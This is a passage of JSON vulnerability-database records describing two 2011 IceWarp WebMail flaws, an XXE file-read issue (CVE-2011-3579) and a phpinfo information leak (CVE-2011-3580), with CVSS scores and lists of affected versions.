"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}], "cve": [{"lastseen": "2022-03-23T12:29:21", "description": "server/webmail.php in IceWarp WebMail in IceWarp Mail Server before 10.3.3 allows remote attackers to read arbitrary files, and possibly send HTTP requests to intranet servers or cause a denial of service (CPU and memory consumption), via an XML external entity declaration in conjunction with an entity reference.", "cvss3": {}, "published": "2011-09-30T17:55:00", "type": "cve", "title": "CVE-2011-3579", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3579"], "modified": "2017-08-29T01:30:00", "cpe": ["cpe:/a:icewarp:mail_server:9.3.0", "cpe:/a:icewarp:mail_server:10.0.3", "cpe:/a:icewarp:mail_server:10.3.1", "cpe:/a:icewarp:mail_server:9.4.2", "cpe:/a:icewarp:mail_server:10.2.0", "cpe:/a:icewarp:mail_server:10.3.0", "cpe:/a:icewarp:mail_server:10.2.2", "cpe:/a:icewarp:mail_server:10.1.1", "cpe:/a:icewarp:mail_server:10.0.4", "cpe:/a:icewarp:mail_server:10.1.4", "cpe:/a:icewarp:mail_server:9.4.0", "cpe:/a:icewarp:mail_server:10.2.1", "cpe:/a:icewarp:mail_server:9.4.1", "cpe:/a:icewarp:mail_server:9.3.2", "cpe:/a:icewarp:mail_server:10.3.2", "cpe:/a:icewarp:mail_server:10.0.8", "cpe:/a:icewarp:mail_server:9.3.1", "cpe:/a:icewarp:mail_server:10.1.3", "cpe:/a:icewarp:mail_server:10.0.7", "cpe:/a:icewarp:mail_server:10.1.2"], "id": "CVE-2011-3579", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3579", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}, "cpe23": ["cpe:2.3:a:icewarp:mail_server:10.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.4.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:29:22", "description": "IceWarp WebMail in IceWarp Mail Server before 10.3.3 allows remote attackers to obtain configuration information via a direct request to the /server URI, which triggers a call to the phpinfo function.", "cvss3": {}, "published": "2011-09-30T17:55:00", "type": "cve", "title": "CVE-2011-3580", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3580"], "modified": "2017-08-29T01:30:00", "cpe": ["cpe:/a:icewarp:mail_server:9.3.0", "cpe:/a:icewarp:mail_server:10.0.3", "cpe:/a:icewarp:mail_server:10.3.1", "cpe:/a:icewarp:mail_server:9.4.2", "cpe:/a:icewarp:mail_server:10.2.0", "cpe:/a:icewarp:mail_server:10.3.0", "cpe:/a:icewarp:mail_server:10.2.2", "cpe:/a:icewarp:mail_server:10.1.1", "cpe:/a:icewarp:mail_server:10.0.4", "cpe:/a:icewarp:mail_server:10.1.4", "cpe:/a:icewarp:mail_server:9.4.0", "cpe:/a:icewarp:mail_server:10.2.1", "cpe:/a:icewarp:mail_server:9.4.1", "cpe:/a:icewarp:mail_server:9.3.2", "cpe:/a:icewarp:mail_server:10.3.2", "cpe:/a:icewarp:mail_server:10.0.8", "cpe:/a:icewarp:mail_server:9.3.1", "cpe:/a:icewarp:mail_server:10.1.3", "cpe:/a:icewarp:mail_server:10.0.7", "cpe:/a:icewarp:mail_server:10.1.2"], "id": "CVE-2011-3580", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3580", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:icewarp:mail_server:10.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.4.0:*:*:*:*:*:*:*"]}], "securityvulns": [{"lastseen": "2021-06-08T18:45:23", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 2, "cvss3": {}, "published": "2011-09-26T00:00:00", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2011-3010", "CVE-2011-3645", "CVE-2011-3579"], "modified": "2011-09-26T00:00:00", "id": "SECURITYVULNS:VULN:11920", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11920", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}